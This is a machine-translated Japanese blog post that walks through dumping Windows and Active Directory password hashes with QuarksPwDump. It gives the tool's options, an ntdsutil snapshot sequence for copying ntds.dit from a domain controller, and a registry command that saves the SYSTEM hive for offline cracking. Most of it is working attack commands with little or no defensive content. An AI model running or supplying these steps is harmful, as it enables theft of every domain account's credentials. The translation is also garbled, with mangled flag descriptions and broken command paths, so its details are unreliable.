攻撃と防御-QuarksPwDumpを使用してドメイン制御パスワードを取得します
Attack Defense Use Quarks Pwdump Get Domain Control Passwords
antian365.comsimeonによる
クォークPwDumpはいquarkslabユーザーパスワード抽出オープンソースツールを作成しました。現在のソフトウェアの最新バージョンは0.2b、その完全なソースコードはhttps://github.com/quarkslab/quarkspwdump取得、現在サポートしていますWindows XP / 2003 / Vista / 7/2008バージョン、および非常に安定しています。つかむことができますウィンドウズプラットフォームでの複数の種類のユーザー資格情報(ローカルアカウント、ドメインアカウント、キャッシュされたドメインアカウント、Bitlocker。著者がこのツールを開発した理由は、現在、すべてのタイプを同時に取得できるツールがないためです。ハッシュとBitlocker情報。
ツールのソースコードのダウンロードアドレス:https://codeload.github.com/quarkslab/quarkspwdump/zip/master。
現在、エクスポートできます:
-ローカルアカウントNT / LMハッシュ+履歴地元NT / LMハッシュ+過去のログイン記録
-ドメインアカウントNT / LMハッシュ+履歴ドメイン内NT / LMハッシュ+過去のログイン記録
-キャッシュされたドメインパスワードキャッシュ内のドメイン管理パスワード
-Bitlocker回復情報(回復パスワードとキーパッケージ)使用するBitlocker復旧後に残された情報。
1.1。使用するクォークPwDumpローカルアカウントのハッシュ値
クォークPwDumpお奨め二コマンドプロンプトで実行し、直接実行しますQuarksPwDumpv0.2b.exe示されているように1示されているように、ヘルプ情報はデフォルトで表示され、そのパラメーターには次の意味があります。
-dhlローカルハッシュ値をエクスポートする
-dhdcドメイン制御されたハッシュ値をメモリにエクスポートする
-dhdドメイン制御ハッシュ値をエクスポートします。指定する必要がありますNTDSファイル
-pcs書き出すBitlocker情報を指定する必要がありますNTDSファイル
-例えば書き出す顧みられない熱帯病ファイル
-歴史履歴情報のエクスポート、オプション
-tエクスポートタイプオプションのデフォルトのエクスポート先ジョンの種類。
-またはファイルをローカルにエクスポートする
図1使用するクォークPwDumpローカルアカウントのハッシュ値
二。使用するクォークPwDumpアカウントインスタンスをエクスポートします
コマンドを使用する 'QuarksPwDumpv0.2b.exe -dhl -o1.txtローカルハッシュを現在のディレクトリにエクスポートします1.txt図に示すように、コマンドを実行して、エクスポートされたアカウントの数を表示します。二示されています。そこに表示3アカウントをにエクスポートする1.txt、オンにする1.txtハッシュ値をエクスポートするための特定のアカウントと値を確認できます。
図二ローカルアカウントをファイルにエクスポート
3.3。協力するntdsutilツールドメイン制御パスワードのエクスポート
Ntdsutil.exeのためのものですActive Directory施設を管理するためのコマンドラインツールを提供します。使えるNtdsutil.exe実施したActive Directoryデータベースの保守、個々のホスト操作の管理と制御、アプリケーションディレクトリパーティションの作成、および未使用による削除Active Directoryインストールガイド(DCPromo.exe)正常に劣化したドメインコントローラーによって残されたメタデータ。Ntdsutilドメイン制御データベースの取得にも使用できますntds.ditファイル、具体的な順序は次のとおりです。
((1)スナップショットを作成する
ntdsutilスナップショット 'インスタンスをアクティブ化ntds'作成終了終了
((二)。NtdsutilActiveDirectoryのスナップショットをマウントする
ntdsutilスナップショット 'mount {GUID}' quit quit
{GUID}示されているように、動的取得の場合3示されています。
((3)スナップショットのローカルディスクをコピーします
MOUNT_POINT windows NTDS ntds.dit c: ntds.ditをコピーします
((4)スナップショットをアンマウントします
ntdsutilスナップショット 'unmount {GUID}' quit quit
((5)スナップショットを削除します
ntdsutilスナップショット 'delete {GUID}' quit quit
図3スナップショットファイルのエクスポート
コマンドを使用する 'QuarksPwDump.exe --dump-hash-domain--ntds-file c: ntds.ditエクスポートされますntds.ditファイル内のハッシュ値は完全にエクスポートされます。完全な例は次のとおりです。
tdsutilスナップショット 'インスタンスntdsをアクティブ化'作成終了終了
ntdsutilスナップショット 'mount {a0455f6c-40c3-4b56-80a0-80261471522c}' quit quit
スナップショット{5e0d92d3-992d-42b9-bbd5-9c85e5dc7827}としてマウント100: $ SNAP_201212082315_VOLUM
EC $
コピーC: $ SNAP_201212082315_VOLUMEC $ windows NTDS ntds.dit c: ntds.dit
ntdsutilスナップショット 'unmount {5e0d92d3-992d-42b9-bbd5-9c85e5dc7827}' quit quit
ntdsutilスナップショット 'delete {5e0d92d3-992d-42b9-bbd5-9c85e5dc7827}' quit quit
QuarksPwDump.exe --dump-hash-domain --ntds-filec: ntds.dit
説明:同じサーバーでハッシュ値を取得するのが最善です。QuarksPwDump.exe直接輸出するntds.ditサーバーで、exportコマンドを実行します。するだけならntds.ditコピー後にローカルにダウンロードすると、読み取り不能エラーが発生する場合があります。インターネット上に1つあります。NTDS.ditパスワードクイック抽出ツール ntdsdump 読者は自分でそれをテストすることができます。ダウンロードしたい場合ntds.ditローカルリカバリにも実行する必要があります」reg save hklm system system.hive'、意志system.hiveとntds.ditドメイン制御パスワードを取得するには、すべてをローカルにコピーします。
参考資料
1.クォークPwDump、http://blog.quarkslab.com/quarks-pwdump.html
NTDS.ditパスワードクイック抽出ツール、http://www.secpulse.com/archives/6301.html
この記事は、元のリンクであるsimeon2005 51CTOブログから転送されています:http://blog.51cto.com/simeon/1744314